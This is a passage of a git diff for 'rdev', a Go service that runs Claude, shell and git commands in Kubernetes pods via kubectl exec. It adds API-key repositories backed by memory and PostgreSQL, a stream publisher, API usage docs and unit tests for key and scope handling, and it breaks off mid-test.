http://localhost:8080/projects/pantheon/claude-config/commands \ + -H "Authorization: Bearer $RDEV_API_KEY" \ + -H "Content-Type: application/json" \ + -d '{ + "name": "deploy", + "content": "---\ndescription: Deploy to production\n---\n\n1. Run tests\n2. Build image\n3. Deploy to k8s" + }' +``` + +### List commands + +```bash +curl http://localhost:8080/projects/pantheon/claude-config/commands \ + -H "Authorization: Bearer $RDEV_API_KEY" +``` + +### Get a specific command + +```bash +curl http://localhost:8080/projects/pantheon/claude-config/commands/deploy \ + -H "Authorization: Bearer $RDEV_API_KEY" +``` + +### Update a command + +```bash +curl -X PUT http://localhost:8080/projects/pantheon/claude-config/commands/deploy \ + -H "Authorization: Bearer $RDEV_API_KEY" \ + -H "Content-Type: application/json" \ + -d '{ + "content": "---\ndescription: Deploy to production (updated)\n---\n\nNew steps..." + }' +``` + +### Delete a command + +```bash +curl -X DELETE http://localhost:8080/projects/pantheon/claude-config/commands/deploy \ + -H "Authorization: Bearer $RDEV_API_KEY" +``` + +## File Format + +Commands, skills, and agents are markdown files with optional YAML frontmatter: + +```markdown +--- +description: Short description shown in /help +--- + +# Full instructions + +Detailed instructions for Claude... +``` + +## Git Integration + +Since files are stored in `/workspace/.claude/`, you can commit them to git: + +```bash +# Via API +POST /projects/pantheon/git +{"args": ["add", ".claude/"]} + +POST /projects/pantheon/git +{"args": ["commit", "-m", "Add deploy command"]} + +POST /projects/pantheon/git +{"args": ["push"]} +``` + +## Shared Credentials + +Claude auth is stored on a shared PVC (`claudebox-shared-claude-config`). + +Authenticate once, all project pods can use it: + +```bash +./scripts/claude-auth.sh pantheon # Auth in any pod +# Now all pods share the credentials +``` diff --git a/internal/adapter/kubernetes/executor.go b/internal/adapter/kubernetes/executor.go new file mode 100644 index 0000000..2540ca6 --- /dev/null +++ b/internal/adapter/kubernetes/executor.go @@ -0,0 +1,212 @@ +// Package kubernetes provides Kubernetes-based implementations of port interfaces. +package kubernetes + +import ( + "bufio" + "context" + "fmt" + "io" + "os/exec" + "sync" + "time" + + "github.com/orchard9/rdev/internal/domain" + "github.com/orchard9/rdev/internal/port" +) + +// Executor implements port.CommandExecutor using kubectl exec. +type Executor struct { + namespace string + mu sync.RWMutex + + // Track active commands for cancellation + activeCommands map[domain.CommandID]context.CancelFunc + activeMu sync.Mutex +} + +// NewExecutor creates a new Kubernetes command executor. +func NewExecutor(namespace string) *Executor { + return &Executor{ + namespace: namespace, + activeCommands: make(map[domain.CommandID]context.CancelFunc), + } +} + +// Ensure Executor implements port.CommandExecutor at compile time. +var _ port.CommandExecutor = (*Executor)(nil) + +// Execute runs a command in the target pod and streams output to the handler. +func (e *Executor) Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error) { + e.mu.RLock() + namespace := e.namespace + e.mu.RUnlock() + + // Create cancellable context for this command + cmdCtx, cancel := context.WithCancel(ctx) + defer cancel() + + // Track for potential cancellation + e.activeMu.Lock() + e.activeCommands[cmd.ID] = cancel + e.activeMu.Unlock() + + defer func() { + e.activeMu.Lock() + delete(e.activeCommands, cmd.ID) + e.activeMu.Unlock() + }() + + startTime := time.Now() + var args []string + + switch cmd.Type { + case domain.CommandTypeClaude: + // claude "prompt" + args = []string{ + "exec", "-n", namespace, podName, "--", + "claude", cmd.Args[0], // prompt is first arg + } + case domain.CommandTypeShell: + // bash -c "command" + args = []string{ + "exec", "-n", namespace, podName, "--", + "bash", "-c", cmd.Args[0], // command is first arg + } + case domain.CommandTypeGit: + // git + args = append([]string{ + "exec", "-n", namespace, podName, "--", + "git", "-C", "/workspace", + }, cmd.Args...) + default: + return &domain.CommandResult{ + CommandID: cmd.ID, + ExitCode: 1, + Error: fmt.Errorf("unknown command type: %s", cmd.Type), + }, nil + } + + // Create the kubectl command + kubectl := exec.CommandContext(cmdCtx, "kubectl", args...) + + // Get stdout and stderr pipes + stdout, err := kubectl.StdoutPipe() + if err != nil { + return &domain.CommandResult{ + CommandID: cmd.ID, + ExitCode: 1, + Error: fmt.Errorf("stdout pipe: %w", err), + }, nil + } + stderr, err := kubectl.StderrPipe() + if err != nil { + return &domain.CommandResult{ + CommandID: cmd.ID, + ExitCode: 1, + Error: fmt.Errorf("stderr pipe: %w", err), + }, nil + } + + // Start the command + if err := kubectl.Start(); err != nil { + return &domain.CommandResult{ + CommandID: cmd.ID, + ExitCode: 1, + Error: fmt.Errorf("start: %w", err), + }, nil + } + + // Stream output concurrently + var wg sync.WaitGroup + wg.Add(2) + + go func() { + defer wg.Done() + streamOutput(stdout, "stdout", handler) + }() + + go func() { + defer wg.Done() + streamOutput(stderr, "stderr", handler) + }() + + // Wait for output to be consumed + wg.Wait() + + // Wait for command to complete + err = kubectl.Wait() + duration := time.Since(startTime) + + result := &domain.CommandResult{ + CommandID: cmd.ID, + DurationMs: duration.Milliseconds(), + } + + if err != nil { + if exitError, ok := err.(*exec.ExitError); ok { + result.ExitCode = exitError.ExitCode() + } else { + result.ExitCode = 1 + result.Error = err + } + } + + return result, nil +} + +// streamOutput reads from a reader and sends each line to the handler. +func streamOutput(r io.Reader, stream string, handler domain.OutputHandler) { + scanner := bufio.NewScanner(r) + // Increase buffer size for long lines + buf := make([]byte, 0, 64*1024) + scanner.Buffer(buf, 1024*1024) + + for scanner.Scan() { + handler(domain.OutputLine{ + Stream: stream, + Line: scanner.Text(), + Timestamp: time.Now(), + }) + } +} + +// Cancel attempts to cancel a running command. +func (e *Executor) Cancel(ctx context.Context, cmdID domain.CommandID) error { + e.activeMu.Lock() + defer e.activeMu.Unlock() + + cancel, exists := e.activeCommands[cmdID] + if !exists { + return domain.ErrCommandNotFound + } + + cancel() + return nil +} + +// PodExists checks if a pod exists and is running. +func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) { + e.mu.RLock() + namespace := e.namespace + e.mu.RUnlock() + + cmd := exec.CommandContext(ctx, "kubectl", + "get", "pod", podName, + "-n", namespace, + "-o", "jsonpath={.status.phase}", + ) + + output, err := cmd.Output() + if err != nil { + // Pod doesn't exist or error + return false, nil + } + + return string(output) == "Running", nil +} + +// CheckConnection verifies connectivity to the Kubernetes cluster. +func (e *Executor) CheckConnection(ctx context.Context) error { + cmd := exec.CommandContext(ctx, "kubectl", "cluster-info", "--request-timeout=5s") + return cmd.Run() +} diff --git a/internal/adapter/memory/apikey_repository.go b/internal/adapter/memory/apikey_repository.go new file mode 100644 index 0000000..85dc90e --- /dev/null +++ b/internal/adapter/memory/apikey_repository.go @@ -0,0 +1,150 @@ +package memory + +import ( + "context" + "sync" + "time" + + "github.com/orchard9/rdev/internal/domain" + "github.com/orchard9/rdev/internal/port" +) + +// APIKeyRepository is an in-memory implementation of port.APIKeyRepository. +type APIKeyRepository struct { + keys map[domain.APIKeyID]*domain.APIKey + keysByHash map[string]domain.APIKeyID + nextID int + mu sync.RWMutex +} + +// NewAPIKeyRepository creates a new in-memory API key repository. +func NewAPIKeyRepository() *APIKeyRepository { + return &APIKeyRepository{ + keys: make(map[domain.APIKeyID]*domain.APIKey), + keysByHash: make(map[string]domain.APIKeyID), + } +} + +// Ensure APIKeyRepository implements port.APIKeyRepository at compile time. +var _ port.APIKeyRepository = (*APIKeyRepository)(nil) + +// Create stores a new API key. +func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error { + r.mu.Lock() + defer r.mu.Unlock() + + r.nextID++ + key.ID = domain.APIKeyID(itoa(r.nextID)) + key.CreatedAt = time.Now() + + // Store the key + r.keys[key.ID] = key + r.keysByHash[keyHash] = key.ID + + return nil +} + +// GetByHash retrieves an API key by its hash. +func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + id, ok := r.keysByHash[keyHash] + if !ok { + return nil, domain.ErrKeyNotFound + } + + key, ok := r.keys[id] + if !ok { + return nil, domain.ErrKeyNotFound + } + + return key, nil +} + +// Get retrieves an API key by ID. +func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + key, ok := r.keys[id] + if !ok { + return nil, domain.ErrKeyNotFound + } + + return key, nil +} + +// List returns all API keys (without secrets). +func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + keys := make([]*domain.APIKey, 0, len(r.keys)) + for _, key := range r.keys { + keys = append(keys, key) + } + + return keys, nil +} + +// Revoke marks an API key as revoked. +func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error { + r.mu.Lock() + defer r.mu.Unlock() + + key, ok := r.keys[id] + if !ok { + return domain.ErrKeyNotFound + } + + if key.RevokedAt != nil { + return domain.ErrKeyNotFound + } + + now := time.Now() + key.RevokedAt = &now + return nil +} + +// UpdateLastUsed updates the last used timestamp for a key. +func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error { + r.mu.Lock() + defer r.mu.Unlock() + + key, ok := r.keys[id] + if !ok { + return domain.ErrKeyNotFound + } + + now := time.Now() + key.LastUsedAt = &now + return nil +} + +// itoa converts an integer to a string. +func itoa(i int) string { + if i == 0 { + return "0" + } + + var buf [20]byte + pos := len(buf) + negative := i < 0 + if negative { + i = -i + } + + for i > 0 { + pos-- + buf[pos] = byte('0' + i%10) + i /= 10 + } + + if negative { + pos-- + buf[pos] = '-' + } + + return string(buf[pos:]) +} diff --git a/internal/adapter/memory/project_repository.go b/internal/adapter/memory/project_repository.go new file mode 100644 index 0000000..f52300a --- /dev/null +++ b/internal/adapter/memory/project_repository.go @@ -0,0 +1,93 @@ +// Package memory provides in-memory implementations of port interfaces for testing. +package memory + +import ( + "context" + "sync" + + "github.com/orchard9/rdev/internal/domain" + "github.com/orchard9/rdev/internal/port" +) + +// ProjectRepository is an in-memory implementation of port.ProjectRepository. +type ProjectRepository struct { + projects map[domain.ProjectID]*domain.Project + mu sync.RWMutex +} + +// NewProjectRepository creates a new in-memory project repository. +func NewProjectRepository() *ProjectRepository { + return &ProjectRepository{ + projects: make(map[domain.ProjectID]*domain.Project), + } +} + +// Ensure ProjectRepository implements port.ProjectRepository at compile time. +var _ port.ProjectRepository = (*ProjectRepository)(nil) + +// List returns all available projects. +func (r *ProjectRepository) List(ctx context.Context) ([]domain.Project, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + projects := make([]domain.Project, 0, len(r.projects)) + for _, p := range r.projects { + projects = append(projects, *p) + } + return projects, nil +} + +// Get returns a project by ID. +func (r *ProjectRepository) Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + p, ok := r.projects[id] + if !ok { + return nil, domain.ErrProjectNotFound + } + return p, nil +} + +// Exists checks if a project exists. +func (r *ProjectRepository) Exists(ctx context.Context, id domain.ProjectID) (bool, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + _, ok := r.projects[id] + return ok, nil +} + +// Register adds a new project to the repository. +func (r *ProjectRepository) Register(ctx context.Context, project *domain.Project) error { + r.mu.Lock() + defer r.mu.Unlock() + + r.projects[project.ID] = project + return nil +} + +// Unregister removes a project from the repository. +func (r *ProjectRepository) Unregister(ctx context.Context, id domain.ProjectID) error { + r.mu.Lock() + defer r.mu.Unlock() + + delete(r.projects, id) + return nil +} + +// RefreshStatus updates the status of all projects. +// For the in-memory implementation, this is a no-op. +func (r *ProjectRepository) RefreshStatus(ctx context.Context) error { + return nil +} + +// SetStatus is a test helper to set a project's status. +func (r *ProjectRepository) SetStatus(id domain.ProjectID, status domain.ProjectStatus) { + r.mu.Lock() + defer r.mu.Unlock() + + if p, ok := r.projects[id]; ok { + p.Status = status + } +} diff --git a/internal/adapter/memory/stream_publisher.go b/internal/adapter/memory/stream_publisher.go new file mode 100644 index 0000000..b2554e7 --- /dev/null +++ b/internal/adapter/memory/stream_publisher.go @@ -0,0 +1,86 @@ +package memory + +import ( + "sync" + + "github.com/orchard9/rdev/internal/port" +) + +// StreamPublisher is an in-memory implementation of port.StreamPublisher. +type StreamPublisher struct { + mu sync.RWMutex + streams map[string][]chan port.StreamEvent +} + +// NewStreamPublisher creates a new in-memory stream publisher. +func NewStreamPublisher() *StreamPublisher { + return &StreamPublisher{ + streams: make(map[string][]chan port.StreamEvent), + } +} + +// Ensure StreamPublisher implements port.StreamPublisher at compile time. +var _ port.StreamPublisher = (*StreamPublisher)(nil) + +// Subscribe creates a subscription to events for the given stream ID. +func (sp *StreamPublisher) Subscribe(streamID string) (<-chan port.StreamEvent, func()) { + sp.mu.Lock() + defer sp.mu.Unlock() + + ch := make(chan port.StreamEvent, 100) + sp.streams[streamID] = append(sp.streams[streamID], ch) + + // Return cleanup function + cleanup := func() { + sp.unsubscribe(streamID, ch) + } + + return ch, cleanup +} + +func (sp *StreamPublisher) unsubscribe(streamID string, ch chan port.StreamEvent) { + sp.mu.Lock() + defer sp.mu.Unlock() + + channels := sp.streams[streamID] + for i, c := range channels { + if c == ch { + sp.streams[streamID] = append(channels[:i], channels[i+1:]...) + close(ch) + break + } + } +} + +// Publish sends an event to all subscribers of a stream. +func (sp *StreamPublisher) Publish(streamID string, event port.StreamEvent) { + sp.mu.RLock() + defer sp.mu.RUnlock() + + for _, ch := range sp.streams[streamID] { + select { + case ch <- event: + default: + // Channel full, skip + } + } +} + +// Close closes a stream and all its subscriptions. +func (sp *StreamPublisher) Close(streamID string) { + sp.mu.Lock() + defer sp.mu.Unlock() + + for _, ch := range sp.streams[streamID] { + close(ch) + } + delete(sp.streams, streamID) +} + +// SubscriberCount returns the number of subscribers for a stream (for testing). +func (sp *StreamPublisher) SubscriberCount(streamID string) int { + sp.mu.RLock() + defer sp.mu.RUnlock() + + return len(sp.streams[streamID]) +} diff --git a/internal/adapter/postgres/apikey_repository.go b/internal/adapter/postgres/apikey_repository.go new file mode 100644 index 0000000..b8a9a1f --- /dev/null +++ b/internal/adapter/postgres/apikey_repository.go @@ -0,0 +1,240 @@ +// Package postgres provides PostgreSQL-based implementations of port interfaces. +package postgres + +import ( + "context" + "database/sql" + "errors" + "fmt" + "time" + + "github.com/lib/pq" + "github.com/orchard9/rdev/internal/domain" + "github.com/orchard9/rdev/internal/port" +) + +// APIKeyRepository implements port.APIKeyRepository using PostgreSQL. +type APIKeyRepository struct { + db *sql.DB +} + +// NewAPIKeyRepository creates a new PostgreSQL API key repository. +func NewAPIKeyRepository(db *sql.DB) *APIKeyRepository { + return &APIKeyRepository{db: db} +} + +// Ensure APIKeyRepository implements port.APIKeyRepository at compile time. +var _ port.APIKeyRepository = (*APIKeyRepository)(nil) + +// Create stores a new API key. +func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error { + scopeStrings := scopesToStrings(key.Scopes) + projectIDStrings := projectIDsToStrings(key.ProjectIDs) + + var id string + err := r.db.QueryRowContext(ctx, ` + INSERT INTO api_keys (name, key_hash, key_prefix, scopes, project_ids, expires_at, created_by) + VALUES ($1, $2, $3, $4, $5, $6, $7) + RETURNING id + `, key.Name, keyHash, key.KeyPrefix, pq.Array(scopeStrings), pq.Array(projectIDStrings), key.ExpiresAt, key.CreatedBy).Scan(&id) + + if err != nil { + return fmt.Errorf("insert key: %w", err) + } + + key.ID = domain.APIKeyID(id) + key.CreatedAt = time.Now() + return nil +} + +// GetByHash retrieves an API key by its hash. +func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) { + var ( + key domain.APIKey + id string + scopeStrings []string + projectIDs []string + ) + + err := r.db.QueryRowContext(ctx, ` + SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by + FROM api_keys + WHERE key_hash = $1 + `, keyHash).Scan( + &id, + &key.Name, + &key.KeyPrefix, + pq.Array(&scopeStrings), + pq.Array(&projectIDs), + &key.CreatedAt, + &key.ExpiresAt, + &key.LastUsedAt, + &key.RevokedAt, + &key.CreatedBy, + ) + + if errors.Is(err, sql.ErrNoRows) { + return nil, domain.ErrKeyNotFound + } + if err != nil { + return nil, fmt.Errorf("query key: %w", err) + } + + key.ID = domain.APIKeyID(id) + key.Scopes = scopesFromStrings(scopeStrings) + key.ProjectIDs = projectIDsFromStrings(projectIDs) + + return &key, nil +} + +// Get retrieves an API key by ID. +func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) { + var ( + key domain.APIKey + keyID string + scopeStrings []string + projectIDs []string + ) + + err := r.db.QueryRowContext(ctx, ` + SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by + FROM api_keys + WHERE id = $1 + `, string(id)).Scan( + &keyID, + &key.Name, + &key.KeyPrefix, + pq.Array(&scopeStrings), + pq.Array(&projectIDs), + &key.CreatedAt, + &key.ExpiresAt, + &key.LastUsedAt, + &key.RevokedAt, + &key.CreatedBy, + ) + + if errors.Is(err, sql.ErrNoRows) { + return nil, domain.ErrKeyNotFound + } + if err != nil { + return nil, fmt.Errorf("query key: %w", err) + } + + key.ID = domain.APIKeyID(keyID) + key.Scopes = scopesFromStrings(scopeStrings) + key.ProjectIDs = projectIDsFromStrings(projectIDs) + + return &key, nil +} + +// List returns all API keys (without secrets). +func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) { + rows, err := r.db.QueryContext(ctx, ` + SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by + FROM api_keys + ORDER BY created_at DESC + `) + if err != nil { + return nil, fmt.Errorf("query keys: %w", err) + } + defer rows.Close() + + var keys []*domain.APIKey + for rows.Next() { + var ( + key domain.APIKey + id string + scopeStrings []string + projectIDs []string + ) + if err := rows.Scan( + &id, + &key.Name, + &key.KeyPrefix, + pq.Array(&scopeStrings), + pq.Array(&projectIDs), + &key.CreatedAt, + &key.ExpiresAt, + &key.LastUsedAt, + &key.RevokedAt, + &key.CreatedBy, + ); err != nil { + return nil, fmt.Errorf("scan key: %w", err) + } + key.ID = domain.APIKeyID(id) + key.Scopes = scopesFromStrings(scopeStrings) + key.ProjectIDs = projectIDsFromStrings(projectIDs) + keys = append(keys, &key) + } + + return keys, nil +} + +// Revoke marks an API key as revoked. +func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error { + result, err := r.db.ExecContext(ctx, ` + UPDATE api_keys SET revoked_at = NOW() + WHERE id = $1 AND revoked_at IS NULL + `, string(id)) + if err != nil { + return fmt.Errorf("revoke key: %w", err) + } + + rows, err := result.RowsAffected() + if err != nil { + return fmt.Errorf("rows affected: %w", err) + } + + if rows == 0 { + return domain.ErrKeyNotFound + } + + return nil +} + +// UpdateLastUsed updates the last used timestamp for a key. +func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error { + _, err := r.db.ExecContext(ctx, ` + UPDATE api_keys SET last_used_at = NOW() WHERE id = $1 + `, string(id)) + return err +} + +// Helper functions for scope conversion +func scopesToStrings(scopes []domain.Scope) []string { + ss := make([]string, len(scopes)) + for i, s := range scopes { + ss[i] = string(s) + } + return ss +} + +func scopesFromStrings(ss []string) []domain.Scope { + scopes := make([]domain.Scope, len(ss)) + for i, s := range ss { + scopes[i] = domain.Scope(s) + } + return scopes +} + +func projectIDsToStrings(ids []domain.ProjectID) []string { + if ids == nil { + return nil + } + ss := make([]string, len(ids)) + for i, id := range ids { + ss[i] = string(id) + } + return ss +} + +func projectIDsFromStrings(ss []string) []domain.ProjectID { + if ss == nil { + return nil + } + ids := make([]domain.ProjectID, len(ss)) + for i, s := range ss { + ids[i] = domain.ProjectID(s) + } + return ids +} diff --git a/internal/auth/keys_test.go b/internal/auth/keys_test.go new file mode 100644 index 0000000..73b0854 --- /dev/null +++ b/internal/auth/keys_test.go @@ -0,0 +1,203 @@ +package auth + +import ( + "testing" + "time" +) + +func TestParseExpiration(t *testing.T) { + tests := []struct { + name string + input string + want time.Duration + wantErr bool + }{ + {"30d", "30d", Expiration30Days, false}, + {"30", "30", Expiration30Days, false}, + {"60d", "60d", Expiration60Days, false}, + {"60", "60", Expiration60Days, false}, + {"90d", "90d", Expiration90Days, false}, + {"90", "90", Expiration90Days, false}, + {"1y", "1y", Expiration1Year, false}, + {"1year", "1year", Expiration1Year, false}, + {"365d", "365d", Expiration1Year, false}, + {"never", "never", ExpirationNoLimit, false}, + {"none", "none", ExpirationNoLimit, false}, + {"empty", "", ExpirationNoLimit, false}, + {"case insensitive", "30D", Expiration30Days, false}, + {"invalid", "invalid", 0, true}, + {"7d", "7d", 0, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + got, err := ParseExpiration(tt.input) + if (err != nil) != tt.wantErr { + t.Errorf("ParseExpiration(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr) + return + } + if got != tt.want { + t.Errorf("ParseExpiration(%q) = %v, want %v", tt.input, got, tt.want) + } + }) + } +} + +func TestExpiresAt(t *testing.T) { + t.Run("returns nil for zero duration", func(t *testing.T) { + got := ExpiresAt(0) + if got != nil { + t.Errorf("ExpiresAt(0) = %v, want nil", got) + } + }) + + t.Run("returns future time for positive duration", func(t *testing.T) { + before := time.Now() + got := ExpiresAt(24 * time.Hour) + after := time.Now() + + if got == nil { + t.Fatal("ExpiresAt(24h) returned nil") + } + + expectedMin := before.Add(24 * time.Hour) + expectedMax := after.Add(24 * time.Hour) + + if got.Before(expectedMin) || got.After(expectedMax) { + t.Errorf("ExpiresAt(24h) = %v, want between %v and %v", *got, expectedMin, expectedMax) + } + }) +} + +func TestGenerateKey(t *testing.T) { + t.Run("generates unique keys", func(t *testing.T) { + key1, id1, err := GenerateKey() + if err != nil { + t.Fatalf("GenerateKey() error = %v", err) + } + + key2, id2, err := GenerateKey() + if err != nil { + t.Fatalf("GenerateKey() error = %v", err) + } + + if key1 == key2 { + t.Error("Generated keys should be unique") + } + + if id1 == id2 { + t.Error("Generated identifiers should be unique") + } + }) + + t.Run("key has correct format", func(t *testing.T) { + key, id, err := GenerateKey() + if err != nil { + t.Fatalf("GenerateKey() error = %v", err) + } + + if !ValidateKeyFormat(key) { + t.Errorf("Generated key %q has invalid format", key) + } + + if len(id) != KeyIdentifierLength { + t.Errorf("Identifier length = %d, want %d", len(id), KeyIdentifierLength) + } + }) + + t.Run("key contains prefix and identifier", func(t *testing.T) { + key, id, err := GenerateKey() + if err != nil { + t.Fatalf("GenerateKey() error = %v", err) + } + + expectedPrefix := KeyPrefix + id + "_" + if key[:len(expectedPrefix)] != expectedPrefix { + t.Errorf("Key %q should start with %q", key, expectedPrefix) + } + }) +} + +func TestHashKey(t *testing.T) { + t.Run("produces consistent hash", func(t *testing.T) { + key := "rdev_sk_abc12345_0123456789abcdef0123456789abcdef" + hash1 := HashKey(key) + hash2 := HashKey(key) + + if hash1 != hash2 { + t.Error("Same key should produce same hash") + } + }) + + t.Run("different keys produce different hashes", func(t *testing.T) { + hash1 := HashKey("key1") + hash2 := HashKey("key2") + + if hash1 == hash2 { + t.Error("Different keys should produce different hashes") + } + }) + + t.Run("hash is hex encoded", func(t *testing.T) { + hash := HashKey("test") + // SHA-256 produces 32 bytes = 64 hex characters + if len(hash) != 64 { + t.Errorf("Hash length = %d, want 64", len(hash)) + } + + for _, c := range hash { + if !((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f')) { + t.Errorf("Hash contains non-hex character: %c", c) + } + } + }) +} + +func TestValidateKeyFormat(t *testing.T) { + tests := []struct { + name string + key string + want bool + }{ + {"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", true}, + {"missing prefix", "abc12345_0123456789abcdef0123456789abcdef", false}, + {"wrong prefix", "api_sk_abc12345_0123456789abcdef0123456789abcdef", false}, + {"short identifier", "rdev_sk_abc1234_0123456789abcdef0123456789abcdef", false}, + {"long identifier", "rdev_sk_abc123456_0123456789abcdef0123456789abcdef", false}, + {"short random", "rdev_sk_abc12345_0123456789abcdef", false}, + {"long random", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef00", false}, + {"missing underscore", "rdev_sk_abc123450123456789abcdef0123456789abcdef", false}, + {"extra underscore", "rdev_sk_abc12345_0123_456789abcdef0123456789abcdef", false}, + {"empty", "", false}, + {"only prefix", "rdev_sk_", false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := ValidateKeyFormat(tt.key); got != tt.want { + t.Errorf("ValidateKeyFormat(%q) = %v, want %v", tt.key, got, tt.want) + } + }) + } +} + +func TestExtractPrefix(t *testing.T) { + tests := []struct { + name string + key string + want string + }{ + {"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", "abc12345"}, + {"missing prefix", "abc12345_random", ""}, + {"only rdev_sk_", "rdev_sk_", ""}, + {"empty", "", ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := ExtractPrefix(tt.key); got != tt.want { + t.Errorf("ExtractPrefix(%q) = %q, want %q", tt.key, got, tt.want) + } + }) + } +} diff --git a/internal/auth/middleware.go b/internal/auth/middleware.go index 0b958cd..7d7df98 100644 --- a/internal/auth/middleware.go +++ b/internal/auth/middleware.go @@ -25,6 +25,12 @@ func GetAPIKey(ctx context.Context) *APIKey { return key } +// WithAPIKey returns a context with the given API key set. +// This is primarily useful for testing. +func WithAPIKey(ctx context.Context, apiKey *APIKey) context.Context { + return context.WithValue(ctx, contextKeyAPIKey, apiKey) +} + // Middleware creates an authentication middleware. func Middleware(svc *Service) func(http.Handler) http.Handler { return func(next http.Handler) http.Handler { diff --git a/internal/auth/scopes_test.go b/internal/auth/scopes_test.go new file mode 100644 index 0000000..420d8c0 --- /dev/null +++ b/internal/auth/scopes_test.go @@ -0,0 +1,155 @@ +package auth + +import ( + "testing" +) + +func TestScopeIsValid(t *testing.T) { + tests := []struct { + name string + scope Scope + want bool + }{ + {"projects:read", ScopeProjectsRead, true}, + {"projects:execute", ScopeProjectsExecute, true}, + {"keys:read", ScopeKeysRead, true}, + {"keys:write", ScopeKeysWrite, true}, + {"admin", ScopeAdmin, true}, + {"invalid", Scope("invalid"), false}, + {"empty", Scope(""), false}, + {"similar", Scope("projects:write"), false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := tt.scope.IsValid(); got != tt.want { + t.Errorf("Scope(%q).IsValid() = %v, want %v", tt.scope, got, tt.want) + } + }) + } +} + +func TestScopesFromStrings(t *testing.T) { + input := []string{"projects:read", "keys:write"} + got := ScopesFromStrings(input) + + if len(got) != 2 { + t.Fatalf("ScopesFromStrings() returned %d scopes, want 2", len(got)) + } + + if got[0] != ScopeProjectsRead { + t.Errorf("got[0] = %v, want %v", got[0], ScopeProjectsRead) + } + + if got[1] != ScopeKeysWrite { + t.Errorf("got[1] = %v, want %v", got[1], ScopeKeysWrite) + } +} + +func TestScopesToStrings(t *testing.T) { + input := []Scope{ScopeProjectsRead, ScopeKeysWrite} + got := ScopesToStrings(input) + + if len(got) != 2 { + t.Fatalf("ScopesToStrings() returned %d strings, want 2", len(got)) + } + + if got[0] != "projects:read" { + t.Errorf("got[0] = %q, want %q", got[0], "projects:read") + } + + if got[1] != "keys:write" { + t.Errorf("got[1] = %q, want %q", got[1], "keys:write") + } +} + +func TestValidateScopes(t *testing.T) { + tests := []struct { + name string + scopes []Scope + want bool + }{ + {"all valid", []Scope{ScopeProjectsRead, ScopeKeysWrite}, true}, + {"single valid", []Scope{ScopeAdmin}, true}, + {"empty", []Scope{}, true}, + {"one invalid", []Scope{ScopeProjectsRead, Scope("invalid")}, false}, + {"all invalid", []Scope{Scope("foo"), Scope("bar")}, false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := ValidateScopes(tt.scopes); got != tt.want { + t.Errorf("ValidateScopes() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestHasScope(t *testing.T) { + tests := []struct { + name string + scopes []Scope + required Scope + want bool + }{ + {"has exact scope", []Scope{ScopeProjectsRead, ScopeKeysRead}, ScopeProjectsRead, true}, + {"admin grants all", []Scope{ScopeAdmin}, ScopeProjectsRead, true}, + {"admin grants keys", []Scope{ScopeAdmin}, ScopeKeysWrite, true}, + {"missing scope", []Scope{ScopeProjectsRead}, ScopeKeysWrite, false}, + {"empty scopes", []Scope{}, ScopeProjectsRead, false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := HasScope(tt.scopes, tt.required); got != tt.want { + t.Errorf("HasScope() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestHasAnyScope(t *testing.T) { + tests := []struct { + name string + scopes []Scope + required []Scope + want bool + }{ + {"has first", []Scope{ScopeProjectsRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true}, + {"has second", []Scope{ScopeKeysRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true}, + {"has neither", []Scope{ScopeKeysWrite}, []Scope{ScopeProjectsRead, ScopeKeysRead}, false}, + {"admin grants any", []Scope{ScopeAdmin}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true}, + {"empty required", []Scope{ScopeProjectsRead}, []Scope{}, false}, + {"empty scopes", []Scope{}, []Scope{ScopeProjectsRead}, false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := HasAnyScope(tt.scopes, tt.required...); got != tt.want { + t.Errorf("HasAnyScope() = %v, want %v", got, tt.want) + } + }) + } +} + +func TestHasProjectAccess(t *testing.T) { + tests := []struct { + name string + allowed []string + project string + want bool + }{ + {"nil allows all", nil, "any-project", true}, + {"in list", []string{"proj-a", "proj-b"}, "proj-a", true}, + {"not in list", []string{"proj-a", "proj-b"}, "proj-c", false}, + {"empty list denies", []string{}, "proj-a", false}, + } + + for _, tt := range tests { 